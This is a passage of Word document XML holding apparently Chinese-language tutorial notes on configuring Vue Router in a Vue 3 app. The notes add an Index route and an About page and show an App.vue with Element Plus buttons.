          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：路由配置新网页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C0674" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630092F7" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F96610C" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6715DB1B" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    createRouter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C837B2A" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    createWebHistory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18EAB9" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>} from 'vue-router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1ADB3" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A1747C" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import Index from '~/pages/index.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE8553" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464D978B" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const routes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BB99E5" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRPr="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0BBD56" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRPr="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        path: '/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B493B" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRPr="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        component: Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE55717" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A228ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AF475" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679103F1" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415133C7" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const router = createRouter({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633C4377" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    history: createWebHistory(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F514D5" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    routes: routes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2CF8BB" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4F1777" w14:textId="77777777" w:rsidR="00A228ED" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2812ED44" w14:textId="274421E6" w:rsidR="007F2C96" w:rsidRDefault="00A228ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792513E1" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E789833" w14:textId="38F25756" w:rsidR="007F2C96" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="006B4B16">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="006B4B16">
        <w:t>pp.vue</w:t>
      </w:r>
      <w:r w:rsidR="000A472E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：使用路由</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7158EBB3" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRPr="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C403456" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script setup&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624AC8D" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// import HelloWorld from './components/HelloWorld.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC4084" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// import TheWelcome from './components/TheWelcome.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343D0A2" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA7B808" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4BFB4C" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F47E23" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0397AB02" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;el-row class="mb-4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C88183B" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-button&gt;Default&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C168B97" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-button type="primary"&gt;Primary&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F5F8F2" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-button type="success"&gt;Success&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C34A1" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-button type="info"&gt;Info&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665BE0B9" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-button type="warning"&gt;Warning&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC90A0C" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-button type="danger"&gt;Danger&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54935D54" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;/el-row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347039CE" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;button class="btn"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按钮是吧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506668F4" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="006B4B16">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;router-view&gt;&lt;/router-view&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D53FAC" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F85399" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FABCB35" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9F73B1" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>.btn{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C261310" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  @apply bg-purple-500 text-light-700 px-4 py-2 rounded-full transition-all duration-500 hover:( bg-pink-900) focus:( ring-8 ring-purple-900);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB60469" w14:textId="77777777" w:rsidR="006B4B16" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1373A0F1" w14:textId="20D40172" w:rsidR="007F2C96" w:rsidRDefault="006B4B16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F1EACE" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC9D5F3" w14:textId="4CA91F82" w:rsidR="007F2C96" w:rsidRDefault="00BA26D2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## </w:t>
      </w:r>
      <w:r w:rsidR="009F12CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加第二个页面：</w:t>
      </w:r>
      <w:r w:rsidR="009F12CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abou</w:t>
      </w:r>
      <w:r w:rsidR="009F12CC">
        <w:t>t.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621A172" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733B67E8" w14:textId="0212EAEA" w:rsidR="007F2C96" w:rsidRDefault="0066741A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>新建</w:t>
      </w:r>
      <w:r w:rsidR="005F2D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidR="005F2D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>rc/pages/about.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E12C9" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F95D845" w14:textId="77777777" w:rsidR="0066741A" w:rsidRPr="0066741A" w:rsidRDefault="0066741A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066741A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1296AD08" w14:textId="77777777" w:rsidR="0066741A" w:rsidRPr="0066741A" w:rsidRDefault="0066741A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066741A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3978B6D7" w14:textId="77777777" w:rsidR="0066741A" w:rsidRPr="0066741A" w:rsidRDefault="0066741A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066741A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        about</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B3304" w14:textId="77777777" w:rsidR="0066741A" w:rsidRPr="0066741A" w:rsidRDefault="0066741A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066741A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E60B32" w14:textId="33B10349" w:rsidR="0066741A" w:rsidRDefault="0066741A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0066741A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF38B40" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0931F51D" w14:textId="405AC666" w:rsidR="007F2C96" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
      <w:r>
        <w:t>/index.js:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置新网页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C950B5C" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02809BBA" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2DE01" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    createRouter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6B7F05" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    createWebHistory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F4A535" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>} from 'vue-router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72932E" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C853D01" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import Index from '~/pages/index.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E821B6A" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F2D5C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import About from '~/pages/about.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2062995C" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A22ED3" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const routes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EB044F" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64111241" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        path: '/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF63ED2" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        component: Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4FE1D" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRPr="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="005F2D5C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08259A3F" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRPr="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F2D5C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B122B" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRPr="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F2D5C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        path: '/about',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914C6B3" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRPr="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F2D5C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        component: About</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D179B04" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F2D5C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2C810" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1DEF5" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C335258" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const router = createRouter({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EABED4" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    history: createWebHistory(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7A214" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    routes: routes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0101DC05" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
